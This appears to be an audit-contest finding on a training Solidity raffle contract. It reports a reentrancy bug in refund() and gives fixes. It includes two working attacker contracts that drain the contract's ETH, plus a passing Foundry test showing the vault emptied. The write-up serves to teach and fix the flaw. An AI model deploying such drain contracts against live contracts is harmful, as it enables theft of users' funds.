Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Reentrancy in `PuppyRaffle::refund()`

scr1tty

Reentrancy in PuppyRaffle::refund()

Risk

Severity: High

Likelihood: High

Overall: Medium - requires deploying a malicious contract to exploit the vulnerability.

Description

refund() does not follow the CEI (Checks-Effects-Interactions) pattern which allows the function to be re-entrant. The value to be refunded is sent first before setting the state to zero.

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
// Checks
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
// Interaction
payable(msg.sender).sendValue(entranceFee);// refund is initiated first
// Effects
players[playerIndex] = address(0);
emit RaffleRefunded(playerAddress);
}

Impact

The attacker will be able to drain the contract's funds by creating a malicious contract that targets the refund() function.

Proof of Concept

Malicious Attacker Contract

contract ReentrancyAttacker {
PuppyRaffle public puppyRaffle;
uint256 public entranceFee;
uint256 public attackerIndex;
constructor(PuppyRaffle _puppyRaffle) {
puppyRaffle = _puppyRaffle;
entranceFee = puppyRaffle.entranceFee();
}
// Step 1 — attacker enters raffle legitimately
function attack() external payable {
address[] memory players = new address[](1);
players[0] = address(this);
puppyRaffle.enterRaffle{value: entranceFee}(players);
// get our index so we can call refund()
attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));
// Step 2 — trigger the vulnerable refund
puppyRaffle.refund(attackerIndex);
}
// Step 3 — this fires every time PuppyRaffle sends us ETH
receive() external payable {
// Step 4 — keep draining as long as the victim has funds
if (address(puppyRaffle).balance >= entranceFee) {
puppyRaffle.refund(attackerIndex);
}
}
// Step 5 — send stolen ETH to the human attacker
function withdraw() external {
payable(msg.sender).transfer(address(this).balance);
}
}

Test Suite

function test_refundReentrant() public {
address[] memory legitPlayers = new address[](100);
for (uint256 i = 0; i < 100; i++) {
legitPlayers[i] = address(uint160(i+1));
}
puppyRaffle.enterRaffle{value: entranceFee * 100}(legitPlayers);
// deploy malicious contract
ReentrancyAttacker poc = new ReentrancyAttacker(puppyRaffle);
// Fund attacker contract
vm.deal(address(poc), entranceFee);
uint256 startingAttackerBalance = address(poc).balance;
uint256 startingVaultBalance = address(puppyRaffle).balance;
// exploit reentrancy vulnerability
poc.attack();
uint256 endingAttackerBalance = address(poc).balance;
uint256 endingVaultBalance = address(puppyRaffle).balance;
// Before the attack
console.log("Vault before:", startingVaultBalance);
console.log("Attacker before:", startingAttackerBalance);
// After the attack
console.log("Vault after:", endingVaultBalance);
console.log("Attacker after:", endingAttackerBalance);
assertEq(endingVaultBalance, 0);
assertGt(endingAttackerBalance, startingAttackerBalance);
}

Test output:

$ forge test --mt test_refundReentrant -vvvv
....
console::log("Vault before:", 100000000000000000000 [1e20]) [staticcall]
console::log("Attacker before:", 0) [staticcall]
console::log("Vault after:", 0) [staticcall]
console::log("Attacker after:", 101000000000000000000 [1.01e20]) [staticcall]
Ran 1 test for test/PuppyRaffleTest.t.sol:PuppyRaffleTest
[PASS] test_refundReentrant() (gas: 12379572)

Recommended Mitigation

Make sure the balance is zeroed out before sending the ETH to the user. Follow the CEI (Checks-Effects-Interaction) pattern to prevent reentrancy attacks.

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
- payable(msg.sender).sendValue(entranceFee);
+ players[playerIndex] = address(0);
- players[playerIndex] = address(0);
+ payable(msg.sender).sendValue(entranceFee);
emit RaffleRefunded(playerAddress);
}

Alternatively, use OpenZeppelin's ReentrancyGuard:

+ import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
- contract PuppyRaffle {
+ contract PuppyRaffle is ReentrancyGuard {
- function refund(uint256 playerIndex) public {
+ function refund(uint256 playerIndex) public nonReentrant {
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!